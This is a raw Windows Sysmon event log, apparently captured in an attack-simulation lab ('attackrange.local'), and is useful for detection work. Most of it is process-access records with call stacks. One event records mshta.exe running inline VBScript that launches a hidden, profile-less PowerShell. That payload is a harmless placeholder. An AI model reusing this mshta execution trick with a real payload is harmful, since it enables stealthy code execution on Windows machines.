15:59:47.740{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.740{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.740{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.725{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.725{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000028167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.712{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%%20""powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit"",0,true"))</script>'"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000028166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 